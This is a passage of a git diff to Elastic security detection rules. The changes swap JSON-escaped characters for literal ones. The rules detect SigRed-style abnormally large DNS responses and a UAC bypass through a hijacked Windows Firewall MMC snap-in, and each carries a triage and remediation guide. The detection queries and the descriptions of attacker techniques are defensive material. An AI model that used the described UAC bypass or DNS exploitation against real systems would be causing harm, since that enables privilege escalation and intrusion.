identified vulnerabilities.\n- If you observe a true positive, implement a remediation plan and monitor host-based artifacts for additional post-exploitation behavior.\n", - "query": "event.category:(network or network_traffic) and destination.port:53 and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes \u003e 60000\n", + "query": "event.category:(network or network_traffic) and destination.port:53 and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes > 60000\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json index ffa44bfc8b6..7deebbc8768 100644 --- a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json +++ b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_104.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Abnormally Large DNS Response", "note": "## Triage and analysis\n\n### Investigating Abnormally Large DNS Response\n\nDetection alerts from this rule indicate possible anomalous activity around large byte DNS responses from a Windows DNS server. This detection rule was created based on activity represented in exploitation of vulnerability (CVE-2020-1350) also known as [SigRed](https://www.elastic.co/blog/detection-rules-for-sigred-vulnerability) during July 2020.\n\n#### Possible investigation steps\n\n- This specific rule is sourced from network log activity such as DNS or network level data. It's important to validate the source of the incoming traffic and determine if this activity has been observed previously within an environment.\n- Activity can be further investigated and validated by reviewing any associated Intrusion Detection Signatures (IDS) alerts.\n- Further examination can include a review of the `dns.question_type` network fieldset with a protocol analyzer, such as Zeek, Packetbeat, or Suricata, for `SIG` or `RRSIG` data.\n- Validate the patch level and OS of the targeted DNS server to validate the observed activity was not large-scale internet vulnerability scanning.\n- Validate that the source of the network activity was not from an authorized vulnerability scan or compromise assessment.\n\n#### False positive analysis\n\n- Based on this rule, which looks for a threshold of 60k bytes, it is possible for activity to be generated under 65k bytes and related to legitimate behavior. In packet capture files received by the [SANS Internet Storm Center](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/), byte responses were all observed as greater than 65k bytes.\n- This activity can be triggered by compliance/vulnerability scanning or compromise assessment; it's important to determine the source of the activity and potentially allowlist the source host.\n\n### Related rules\n\n- Unusual Child Process of dns.exe - 8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45\n- Unusual File Modification by dns.exe - c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restarted the patched machines. If unable to patch immediately, Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn\u2019t require a restart. This can be used as a temporary solution before the patch is applied.\n- Maintain backups of your critical systems to aid in quick recovery.\n- Perform routine vulnerability scans of your systems, monitor [CISA advisories](https://us-cert.cisa.gov/ncas/current-activity) and patch identified vulnerabilities.\n- If you observe a true positive, implement a remediation plan and monitor host-based artifacts for additional post-exploitation behavior.\n", - "query": "event.dataset: network_traffic.dns and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes \u003e 60000\n", + "query": "event.dataset: network_traffic.dns and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes > 60000\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json index a4476e5b0cd..ae4a233a4ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json +++ b/packages/security_detection_engine/kibana/security_rule/11013227-0301-4a8c-b150-4db924484475_105.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "Abnormally Large DNS Response", "note": "## Triage and analysis\n\n### Investigating Abnormally Large DNS Response\n\nDetection alerts from this rule indicate possible anomalous activity around large byte DNS responses from a Windows DNS server. This detection rule was created based on activity represented in exploitation of vulnerability (CVE-2020-1350) also known as [SigRed](https://www.elastic.co/blog/detection-rules-for-sigred-vulnerability) during July 2020.\n\n#### Possible investigation steps\n\n- This specific rule is sourced from network log activity such as DNS or network level data. It's important to validate the source of the incoming traffic and determine if this activity has been observed previously within an environment.\n- Activity can be further investigated and validated by reviewing any associated Intrusion Detection Signatures (IDS) alerts.\n- Further examination can include a review of the `dns.question_type` network fieldset with a protocol analyzer, such as Zeek, Packetbeat, or Suricata, for `SIG` or `RRSIG` data.\n- Validate the patch level and OS of the targeted DNS server to validate the observed activity was not large-scale internet vulnerability scanning.\n- Validate that the source of the network activity was not from an authorized vulnerability scan or compromise assessment.\n\n#### False positive analysis\n\n- Based on this rule, which looks for a threshold of 60k bytes, it is possible for activity to be generated under 65k bytes and related to legitimate behavior. In packet capture files received by the [SANS Internet Storm Center](https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/), byte responses were all observed as greater than 65k bytes.\n- This activity can be triggered by compliance/vulnerability scanning or compromise assessment; it's important to determine the source of the activity and potentially allowlist the source host.\n\n### Related rules\n\n- Unusual Child Process of dns.exe - 8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45\n- Unusual File Modification by dns.exe - c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Ensure that you have deployed the latest Microsoft [Security Update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) (Monthly Rollup or Security Only) and restarted the patched machines. If unable to patch immediately, Microsoft [released](https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability) a registry-based workaround that doesn\u2019t require a restart. This can be used as a temporary solution before the patch is applied.\n- Maintain backups of your critical systems to aid in quick recovery.\n- Perform routine vulnerability scans of your systems, monitor [CISA advisories](https://us-cert.cisa.gov/ncas/current-activity) and patch identified vulnerabilities.\n- If you observe a true positive, implement a remediation plan and monitor host-based artifacts for additional post-exploitation behavior.\n", - "query": "(event.dataset: network_traffic.dns or (event.category: (network or network_traffic) and destination.port: 53)) and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes \u003e 60000\n", + "query": "(event.dataset: network_traffic.dns or (event.category: (network or network_traffic) and destination.port: 53)) and\n (event.dataset:zeek.dns or type:dns or event.type:connection) and network.bytes > 60000\n", "references": [ "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json index 2fa35a97c97..96cf911a51f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_103.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json index f2c433f5f27..d0abde6defa 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_104.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json index 8bb417b3d20..0368ba7f888 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_105.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json index 691b7279715..fcc75c3caa4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_106.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json index 21a3138177a..d189c3be476 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_107.json @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json index 93eeb437762..d55019ba177 100644 --- a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_108.json @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json index a4f7d4dc573..9ab5a86a75a 100644 --- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json index 44b646dcb23..15d27d904e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n 